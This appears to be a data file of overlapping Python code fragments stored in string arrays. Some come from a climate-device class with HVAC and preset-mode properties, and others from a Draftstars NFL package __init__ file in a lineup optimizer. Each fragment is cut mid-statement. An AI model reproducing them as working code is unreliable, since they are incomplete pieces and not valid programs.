STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the", "return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported", "list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset" ]
[ "from .importer import * from .settings import * __all__ = [ 'DraftstarsCSVImporter', 'DraftstarsNFLSettings'", "<filename>pydfs_lineup_optimizer/sites/draftstarsnfl/__init__.py from .importer import * from .settings import * __all__ = [ 'DraftstarsCSVImporter',", ".importer import * from .settings import * __all__ = [ 'DraftstarsCSVImporter', 'DraftstarsNFLSettings' ]" ]